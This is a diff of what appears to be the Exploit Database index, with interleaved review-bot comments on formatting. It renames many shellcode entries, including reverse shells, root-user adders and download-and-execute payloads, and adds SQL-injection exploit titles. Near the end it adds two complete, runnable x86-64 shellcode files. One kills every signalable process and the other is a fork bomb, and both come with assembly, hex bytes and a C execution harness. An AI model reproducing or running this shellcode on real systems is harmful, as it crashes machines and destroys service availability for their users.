 13517,platforms/win_x86/shellcode/13517.asm,"Win32 - Download File + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
@@ -16045,7 +16046,7 @@ id,file,description,date,author,platform,type,port
 13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0
 13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0
 13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0
-13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes)",2004-10-25,lion,win_x86,shellcode,0
+13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator)",2004-10-25,lion,win_x86,shellcode,0
 13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File + Execute Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0
 13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
 13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind 58821/TCP Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
@@ -16134,7 +16135,7 @@ id,file,description,date,author,platform,type,port
 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
-14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Netcat Connectback 8080/TCP Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
+14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
 13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0
 13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0
 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
@@ -16175,7 +16176,7 @@ id,file,description,date,author,platform,type,port
 15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
+15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
 15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
 15879,platforms/win_x86/shellcode/15879.txt,"Win32 - Speaking 'You got pwned!' Shellcode",2010-12-31,Skylined,win_x86,shellcode,0
@@ -16188,8 +16189,8 @@ id,file,description,date,author,platform,type,port
 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
 17326,platforms/windows/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
-17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
-17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
+17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
+17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
 17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0
@@ -16197,7 +16198,7 @@ id,file,description,date,author,platform,type,port
 17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0
 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
-18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
+18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0
 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
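Review bot: The new description for 18163 carries a stray apostrophe inside the credential pair, `(rOOt/'pwn3d)`, whereas the two parallel entries renamed in this commit (15616 and 17439) use the unquoted `(shell-storm/toor)` form; the line should read `"Linux/MIPS - Add User(UID 0) (rOOt/pwn3d) Shellcode (164 bytes)"`. The leftover quote looks like a remnant of the old `'rOOt' with password 'pwn3d'` wording rather than a deliberate choice. The same commit message at the top of the patch repeats the typo, so it will surface in the changelog as well.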
@@ -16228,12 +16229,12 @@ id,file,description,date,author,platform,type,port 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 -34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 +34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 -35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP Password Shell (4444/TCP) Shellcode (81/96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 -35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Connect Shellcode (77-85/90-98 bytes with Password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 
+35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0 35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0 35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 
@@ -16292,13 +16293,13 @@ id,file,description,date,author,platform,type,port 38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0 -38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind 31173/TCP Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 +38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)",2015-12-13,B3mB4m,generator,shellcode,0 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 -39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind 4444/TCP Password Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 +39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 
'dhn' Herrmann",lin_x86,shellcode,0 39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 @@ -16307,7 +16308,7 @@ id,file,description,date,author,platform,type,port 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 +39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 
@@ -16344,11 +16345,11 @@ id,file,description,date,author,platform,type,port 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 -40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 +40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 -40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind Shell / Syscall Persistent / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 +40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 - Axis 
Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0 @@ -16366,7 +16367,7 @@ id,file,description,date,author,platform,type,port 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File + Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0 40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0 -40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind Password (h271508F) 2493/TCP Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 +40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0 
@@ -16409,6 +16410,8 @@ id,file,description,date,author,platform,type,port 42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0 42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0 42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 
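Review bot: The two added rows spell the architecture `Linux/x86_64` while every neighbouring row in this hunk (42339, 42485) and the `lin_x86-64` platform column use `Linux/x86-64`, so a search on the established spelling will miss the new entries. The description column for 42522 also starts with lowercase `kill` where the surrounding rows capitalise each word. `42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",…` and the matching `Linux/x86-64 - Fork Bomb Shellcode (11 bytes)` for 42523 would keep the index on one convention.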
@@ -38216,6 +38219,7 @@ id,file,description,date,author,platform,type,port 42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0 42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0 42291,platforms/php/webapps/42291.txt,"WordPress Plugin WatuPRO 5.5.1 - SQL Injection",2017-07-03,"Manich Koomsusi",php,webapps,0 +42520,platforms/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,php,webapps,0 42306,platforms/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps,0 42307,platforms/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps,0 42308,platforms/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps,0 
@@ -38307,3 +38311,15 @@ id,file,description,date,author,platform,type,port 42502,platforms/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42504,platforms/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps,0 42517,platforms/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps,0 +42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42527,platforms/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42528,platforms/php/webapps/42528.txt,"PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42529,platforms/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42530,platforms/php/webapps/42530.txt,"Joomla! Component FocalPoint 1.2.3 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42531,platforms/php/webapps/42531.txt,"Php Cloud mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",php,webapps,0 +42532,platforms/php/webapps/42532.txt,"Joomla! 
Component Ajax Quiz 1.8 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42533,platforms/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42534,platforms/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42535,platforms/php/webapps/42535.txt,"PHPMyWind 5.3 - Cross-Site Scripting",2017-08-21,小雨,php,webapps,0 diff --git a/platforms/lin_x86-64/shellcode/42522.c b/platforms/lin_x86-64/shellcode/42522.c new file mode 100755 index 000000000..6ff336afd --- /dev/null +++ b/platforms/lin_x86-64/shellcode/42522.c 
@@ -0,0 +1,63 @@
+/*
+;Title: Linux/x86_64 - kill() All Processes Shellcode
+;Author: Touhid M.Shaikh
+;Contact: https://github.com/touhidshaikh
+;Category: Shellcode
+;Architecture: Linux x86_64
+;Description: If pid == -1, then sig is sent to every process for which the
+calling process has permission to send signals, except for process 1 (init)
+;Shellcode Length: 19
+;Tested on : Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux
+
+
+
+===COMPILATION AND EXECUTION Assemmbly file===
+
+#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
+
+#ld shell.o -o shell <=== Making Binary File
+
+#./bin2shell.sh shell <== xtract hex code from the binary(
+https://github.com/touhidshaikh/bin2shell)
+
+=================SHELLCODE(INTEL FORMAT)=================
+
+section .text
+global _start:
+_start:
+xor rax,rax
+push byte -1 ; pid = -1,
+pop rdi
+add rax,9 ; sig
+mov rsi,rax
+add rax,53 ; kill system call number 9+53=62
+syscall
+
+
+===================END HERE============================
+
+====================FOR C Compile===========================
+
+Compile with gcc with some options.
+
+# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
+
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x48\x31\xc0\x6a\xff\x5f\x48\x83\xc0\x09\x48\x89\xc6\x48\x83\xc0\x35\x0f\x05";
+
+
+main()
+{
+
+printf("Shellcode Length: %d\n", (int)strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+
+}
diff --git a/platforms/lin_x86-64/shellcode/42523.c b/platforms/lin_x86-64/shellcode/42523.c
new file mode 100755
index 000000000..472d44805
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/42523.c
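Review bot: `main()` near the bottom of 42522.c is declared without a return type, which C99 and later compilers reject (implicit int) and which the commit's own `gcc` line in the header comment will trip over on a modern toolchain; `int main(void)` with a closing `return 0;` is the portable form. The two `#include` lines also carry no header name in this rendering — `printf` needs `<stdio.h>` and `strlen` needs `<string.h>` — so either the names were lost in extraction or the file does not compile as committed. The header comment documents the pid == -1 semantics but, unlike 42523.c, never says that running the test harness is itself destructive; a line such as `;WARNING: executing this harness signals every process the user may signal — run only in a disposable VM` would match the sibling file. 42523.c in the next hunk has the same `main()` and `#include` problems.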
@@ -0,0 +1,61 @@
+/*
+;Title: Linux/x86_64 - fork() Bomb (11 bytes)
+;Author: Touhid M.Shaikh
+;Contact: https://twitter.com/touhidshaikh
+;Category: Shellcode
+;Architecture: Linux x86_64
+;Description: WARNING! this shellcode may crash your computer if executed
+in your system.
+;Shellcode Length: 11
+;Tested on : Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
+
+
+
+===COMPILATION AND EXECUTION Assemmbly file===
+
+#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
+
+#ld shell.o -o shell <=== Making Binary File
+
+#./bin2shell.sh shell <== xtract hex code from the binary(
+https://github.com/touhidshaikh/bin2shell)
+
+=================SHELLCODE(INTEL FORMAT)=================
+
+section .text
+ global _start:
+_start:
+ xor rax,rax
+ add rax,57
+ syscall
+ jmp _start
+
+===================END HERE============================
+
+====================FOR C Compile===========================
+
+Compile with gcc with some options.
+
+# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
+
+*/
+
+#include
+#include
+
+
+unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\xeb\xf5";
+
+main()
+{
+
+printf("Shellcode Length: %d\n", (int)strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+
+}
+
+/*More Shellcode => Download Link :
+https://github.com/touhidshaikh/shellcode/tree/master/Linux */
diff --git a/platforms/php/webapps/42520.txt b/platforms/php/webapps/42520.txt
new file mode 100755
index 000000000..abe726b59
--- /dev/null
+++ b/platforms/php/webapps/42520.txt
